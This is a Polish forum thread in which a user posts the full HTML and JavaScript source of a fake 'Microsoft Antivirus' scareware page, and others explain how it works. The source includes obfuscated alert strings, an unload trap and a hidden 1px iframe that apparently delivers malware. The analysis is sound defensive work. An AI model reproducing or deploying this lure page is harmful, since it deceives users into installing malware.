Śmieszny "wirus" w JavaScript - znalezione przypadkiem

Przeglądając sieć (konkretnie chyba ask.fm od losowej osoby) natrafiłem na dziwną stronę (nie wiem gdzie kliknąłem naprawdę). Strona ta wykonywała taki kod:

<html>
<head>
    <script>
        var truster=Math.random();
        window.moveTo(truster-2*truster+truster,truster-2*truster+truster);
        window.resizeTo(screen.width,screen.height);
        var jackString="Microsoft_jackVorobey|Antivirus_jackVorobey|has_jackVorobey|found_jackVorobey|critical_jackVorobey|process_jackVorobey|activity_jackVorobey|on_jackVorobey|your_jackVorobey|PC";
        var kuchko="\nYou_jackVorobey|need_jackVorobey|to_jackVorobey|clean_jackVorobey|your_jackVorobey|computer_jackVorobey|to_jackVorobey|prevent_jackVorobey|the_jackVorobey|system_jackVorobey|breakage.";
        var eroskopli=1;
    </script>

    <title>Alert</title>
</head>
<body topmargin=0 leftmargin=0 bgcolor='#FFFFFF'>
<table cellspacing="0" cellpadding="0" border="0" width="100%" height="99%">
    <tr valign="middle" align="center"><td>

        <img id="al" src="http://ibypcfv.myvnc.com/images/lee/message.png" width="617" height="345" border="0" usemap="#maper">
        <map name="maper">
            <area shape="rect" coords="544,12,593,33" onmousedown='kloustrafobia();'>
            <area shape="rect" coords="480,287,578,308" onclick="kolokolchik();" style='cursor:pointer' onmousedown='eroskopli=0;'>
        </map>
    </td>
    </tr>
</table>
<div id="contentInner"></div>
</body>

<script>
    result=jackString.replace(/_jackVorobey\|/g, ' ')+kuchko.replace(/_jackVorobey\|/g, ' ');
    function kakashka(){
        return eroskopli==1?result:false;
    }
    window.onbeforeunload=kakashka;

    function kloustrafobia(){
            alert(result);
    }
    kloustrafobia();

    function kolokolchik(){
        var ds = "IFR";
        ds+="AME";
        var aafd = document.createElement(ds);
        aafd.src = "?c=RaEQL35Qhmg6kIcNyKqYS3/qzajgEyyBice/1X4aIdrWhbwB2GiTinHO11IRhFwRpScKkbUaOZz21LRlB1+g96CRictdheP8Lfq+X/WG9sHu";
        aafd.style.width = "1px";
        aafd.style.height = "1px";
        aafd.style.border = "1px";
        document.getElementById('contentInner').appendChild(aafd)
    }
    /*window.setTimeout(function(){
        kolokolchik();
    }, 4000);*/ 

</script>
</html> 

Jest to mniej więcej dla mnie zrozumiałe jednak nie bardzo rozumiem sens działania funkcji "kolokolchik". Co ona właściwie robi? Wygląda na to, że jest wywoływana podczas zjechania myszką w duł (no ale kurde gdzie?!) i tworzy ramkę (domyślnie 0px border był ale zmieniłem).
Co pod tym linkiem "?c" może się znajdować?
Jak w ogóle udało mi się trafić na taką stronę? To wygląda na hm.. lokalny serwer z zewnętrznym IP ustawionym przez stronę no-ip.org

Czy jakiś kod javascript czy inny webowy what ever mógł zainfekować komputer?

Pierwszy <script>:

• rozciąga nowe okno (popup zapewne) na cały ekran, ustawia je w pozycji (0,0) (te obliczenia matematyczne dadzą zero)
• ustwia zmienną jackString i kuchko i łączy w nieczytelny sposób informację o rzekomym zainfekowaniu. takie kodowanie stringa ma spowodować, żeby antywirusy nie rozpoznawały tej strony jako niebezpieczna

Na stronie wyświetlony jest jakiś obrazek (zapewne informacja o infekcji w formie okienka windowsowefo)

Drugi <script>:
jackString jest odkodowywany do postaci:

Microsoft Antivirus has found critical process activity on your PC
You need to clean your computer to prevent the system breakage.

i wyświetlany w okienku alert

funkcja klaustrofobia jest wykonywana po kliknięciu w jakiś mały obszar (zapewne krzyżyk zamykający pseudookienko które jest obrazkiem) i wyświetla w alercie to samo co pokazuje się po załadowaniu strony. nic więcej się nie dzieje, co ma przekonać usera, że tego zignorować i zamknąć nie można.

kolokolchik jest wykonywane podczas kliknięcia w jakiś większy obszar (zapewne przycisk typu "SCAN MY PC"), co chyba jasno sugeruje onclick zaraz koło nazwy funkcji.
wstawia ona iframe o wymiarach 1x1 (czyli strona ma się załadować tylko, nie ma być widoczna) do #contentInner
skrypt w iframie zapewne wykonuje jakieś dalsze akcje na dokumencie, tj. przede wszystkim po unikalnym identyfikatorze (ta losowa zmienna c) rozpoznaje, że ktoś był głupi i kliknął, zapewne serwuje plik z wirusem do pobrania, i być może zmienia też treść głównej strony (np. gratulując pobrania programu i radząc zignorować wszystkie systemowe alerty o pobieranych z sieci plikach)

takie strony serwują np. strony warezowe, na których umieszczone są reklamy, ale też czasem i jakieś kwejki czy ostatnio wykop.pl, jak nieuważnie dobierają reklamodawców

sama strona automagicznie Cię nie zainfekuje - jak widzisz - logika strony jest prosta - "wyświetlaj alerta aż user pobierze i uruchomi nasz program", kod jedynie jest zaciemniony, by oszukać prawdziwe antywirusy. samo się nic nie da zainfekować javascriptem (chyba, że w IE6) na dziurawej przeglądarce można coś w ten iframe wrzucić, co może spowodować uruchomienie czegoś bez interakcji użytkownika (choć na tej stronie, żeby ten iframe się wstawił i tak trzeba kliknąć), choć na tym konkretnym przypadku bym się tego nie spodziewał

@dzek59
Nie no chyba nie kliknąłem na "clean" ani "wyjdź" tylko do razu w źródło strony się wbiłem więc no...
Tak czy inaczej przeklikałem oba okienka JS "Ok" i "Ok" chyba. Antywirus mi nic nie wykrył więc hmm chyba jest okej.

@dzek69
pod tym "linkiem":

aafd.src = "?c=RaEQL35Qhmg6kIcNyKqYS3/qzajgEyyBice/1X4aIdrWhbwB2GiTinHO11IRhFwRpScKkbUaOZz21LRlB1+g96CRictdheP8Lfq+X/WG9sHu";

znajduje się prawdopodobnie link do obrazka (tego z screenu antywirusa), pokazuje się on w odpowiednio powiększonej ramce. Tylko jaki cel byłby robić taką małą ramkę.. coś innego mogło się tam znajdować?
Jak wspomniałem antywirus nic nie wykrył no ale kurde męczy mnie to.

antywirus nic nie wykrył, bo to jest przygotowane tak, żeby nic nie wykrył. w ramce zapewne oferowało Ci pobranie jakiegoś syfu, albo próbowało wykorzystać jakąś dziurę dla specyficznej przeglądarki, ale ty masz inną bądź zaktualizowaną. albo po prostu masz coś nowego w systemie i nawet o tym nie wiesz ;) (skuteczność antywirusów jest bardzo słaba jeżeli chodzi o nowe zagrożenia, a i z tymi starymi czasem nie jest kolorowo)

@dzek69
ESET Online wykrył i usunął plik .lnk z AppData\Roaming\Windows\Recent , który miał nazwę tego długiego ciągu znaków i własnie rozszerzenie lnk. Myślę, że teraz jest już czysto.
Co prawda oznaczył go jako trojan.. no ale jak taki plik .lnk może być groźny?

jeżeli linkuje do polecenia formatującego dysk, to chyba jest groźny, nie? ;)

No już go nie ma :). Nie wiem do czego linkował.. w każdym razie ciągle mam jakieś przeczucie, że nie wszystko jest okej:/. Skanowałem ESETEM, Microsoft Defender i MS Malware Removal tool... nic juz nie znalazło.